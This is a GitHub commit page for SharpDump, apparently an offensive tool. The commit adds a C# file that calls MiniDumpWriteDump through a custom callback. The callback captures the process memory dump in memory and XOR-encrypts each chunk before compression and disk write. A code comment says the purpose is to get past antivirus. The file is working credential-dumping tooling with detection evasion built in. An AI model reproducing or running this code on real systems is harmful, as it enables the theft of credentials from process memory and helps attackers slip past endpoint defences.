Skip to content

Commit f5e7cdc

Browse files
hfz1337hfz1337
committed
feat: gzip(xor(dmp,42)) in memory before touching disk
typo: match filename with the hint fix: don't hardcode memory allocation enhance: randomize filename fix: ensure chunks are sorted by offset
1 parent 41cfcf9 commit f5e7cdc

File tree

4 files changed

+286
-62
lines changed

4 files changed

+286
-62
lines changed

SharpDump/MiniDump.cs

Lines changed: 177 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,177 @@
1+
using System;
2+
using System.Runtime.InteropServices;
3+
4+
namespace SharpDump
5+
{
6+
class MiniDump
7+
{
8+
[StructLayout(LayoutKind.Sequential)]
9+
public struct MINIDUMP_IO_CALLBACK
10+
{
11+
public IntPtr Handle;
12+
public ulong Offset;
13+
public IntPtr Buffer;
14+
public uint BufferBytes;
15+
}
16+
17+
[StructLayout(LayoutKind.Explicit)]
18+
public unsafe struct MINIDUMP_CALLBACK_UNION
19+
{
20+
[FieldOffset(0)]
21+
public MINIDUMP_IO_CALLBACK Io;
22+
23+
[FieldOffset(0)]
24+
public fixed byte Padding[1296];
25+
}
26+
27+
[StructLayout(LayoutKind.Explicit)]
28+
public unsafe struct MINIDUMP_CALLBACK_INPUT
29+
{
30+
[FieldOffset(0)]
31+
public uint ProcessId;
32+
33+
[FieldOffset(4)]
34+
public IntPtr ProcessHandle;
35+
36+
[FieldOffset(12)]
37+
public MINIDUMP_CALLBACK_TYPE CallbackType;
38+
39+
[FieldOffset(16)]
40+
public MINIDUMP_CALLBACK_UNION Union;
41+
}
42+
43+
[StructLayout(LayoutKind.Sequential)]
44+
public struct MINIDUMP_CALLBACK_OUTPUT
45+
{
46+
public HRESULT Status;
47+
}
48+
49+
[StructLayout(LayoutKind.Sequential)]
50+
public struct MINIDUMP_CALLBACK_INFORMATION
51+
{
52+
public MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
53+
public IntPtr CallbackParam;
54+
}
55+
56+
[Flags]
57+
public enum MINIDUMP_TYPE : uint
58+
{
59+
MiniDumpNormal = 0x00000000,
60+
MiniDumpWithDataSegs = 0x00000001,
61+
MiniDumpWithFullMemory = 0x00000002,
62+
MiniDumpWithHandleData = 0x00000004,
63+
MiniDumpFilterMemory = 0x00000008,
64+
MiniDumpScanMemory = 0x00000010,
65+
MiniDumpWithUnloadedModules = 0x00000020,
66+
MiniDumpWithIndirectlyReferencedMemory = 0x00000040,
67+
MiniDumpFilterModulePaths = 0x00000080,
68+
MiniDumpWithProcessThreadData = 0x00000100,
69+
MiniDumpWithPrivateReadWriteMemory = 0x00000200,
70+
MiniDumpWithoutOptionalData = 0x00000400,
71+
MiniDumpWithFullMemoryInfo = 0x00000800,
72+
MiniDumpWithThreadInfo = 0x00001000,
73+
MiniDumpWithCodeSegs = 0x00002000,
74+
MiniDumpWithoutAuxiliaryState = 0x00004000,
75+
MiniDumpWithFullAuxiliaryState = 0x00008000,
76+
MiniDumpWithPrivateWriteCopyMemory = 0x00010000,
77+
MiniDumpIgnoreInaccessibleMemory = 0x00020000,
78+
MiniDumpWithTokenInformation = 0x00040000,
79+
MiniDumpValidTypeFlags = 0x0007ffff
80+
}
81+
82+
[Flags]
83+
public enum MINIDUMP_CALLBACK_TYPE : uint
84+
{
85+
ModuleCallback = 0,
86+
ThreadCallback = 1,
87+
ThreadExCallback = 2,
88+
IncludeThreadCallback = 3,
89+
IncludeModuleCallback = 4,
90+
MemoryCallback = 5,
91+
CancelCallback = 6,
92+
WriteKernelMinidumpCallback = 7,
93+
KernelMinidumpStatusCallback = 8,
94+
RemoveMemoryCallback = 9,
95+
IncludeVmRegionCallback = 10,
96+
IoStartCallback = 11,
97+
IoWriteAllCallback = 12,
98+
IoFinishCallback = 13,
99+
ReadMemoryFailureCallback = 14,
100+
SecondaryFlagsCallback = 15
101+
}
102+
103+
[Flags]
104+
public enum HRESULT : uint
105+
{
106+
S_OK = 0,
107+
S_FALSE = 1
108+
}
109+
110+
// partially adapted from https://blogs.msdn.microsoft.com/dondu/2010/10/24/writing-minidumps-in-c/
111+
[DllImport(
112+
"dbghelp.dll",
113+
EntryPoint = "MiniDumpWriteDump",
114+
CallingConvention = CallingConvention.StdCall,
115+
CharSet = CharSet.Unicode,
116+
ExactSpelling = true,
117+
SetLastError = true)]
118+
public static extern bool MiniDumpWriteDump(
119+
IntPtr hProcess,
120+
uint ProcessId,
121+
IntPtr hFile,
122+
MINIDUMP_TYPE DumpType,
123+
IntPtr ExceptionParam,
124+
IntPtr UserStreamParam,
125+
MINIDUMP_CALLBACK_INFORMATION CallbackParam);
126+
127+
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
128+
public unsafe delegate bool MINIDUMP_CALLBACK_ROUTINE(
129+
IntPtr CallbackParam,
130+
MINIDUMP_CALLBACK_INPUT* CallbackInput,
131+
MINIDUMP_CALLBACK_OUTPUT* CallbackOutput);
132+
133+
public unsafe static bool Callback(
134+
IntPtr CallbackParam,
135+
MINIDUMP_CALLBACK_INPUT* CallbackInput,
136+
MINIDUMP_CALLBACK_OUTPUT* CallbackOutput)
137+
{
138+
switch (CallbackInput->CallbackType)
139+
{
140+
case MINIDUMP_CALLBACK_TYPE.IoStartCallback:
141+
CallbackOutput->Status = HRESULT.S_FALSE;
142+
break;
143+
144+
case MINIDUMP_CALLBACK_TYPE.IoWriteAllCallback:
145+
CallbackOutput->Status = HRESULT.S_OK;
146+
147+
uint len = CallbackInput->Union.Io.BufferBytes;
148+
IntPtr destination = Marshal.AllocHGlobal((int)len);
149+
150+
// copy the current chunk
151+
Buffer.MemoryCopy((byte*)CallbackInput->Union.Io.Buffer, (byte*)destination, len, len);
152+
153+
/*
154+
* We can do an extra transformation at this stage, like XOR-encrypt
155+
* the MiniDump before compressing it and writing it to disk.
156+
* This can be useful if gzip compression alone turns out to be
157+
* useless against AV.
158+
*
159+
* Example:
160+
*/
161+
for (int i = 0; i < len; i++)
162+
((byte*)destination)[i] ^= 42;
163+
164+
Globals.Chunks.Add((destination, (int)len, (int)CallbackInput->Union.Io.Offset));
165+
break;
166+
167+
case MINIDUMP_CALLBACK_TYPE.IoFinishCallback:
168+
CallbackOutput->Status = HRESULT.S_OK;
169+
break;
170+
171+
default:
172+
break;
173+
}
174+
return true;
175+
}
176+
}
177+
}

0 commit comments

Comments
 (0)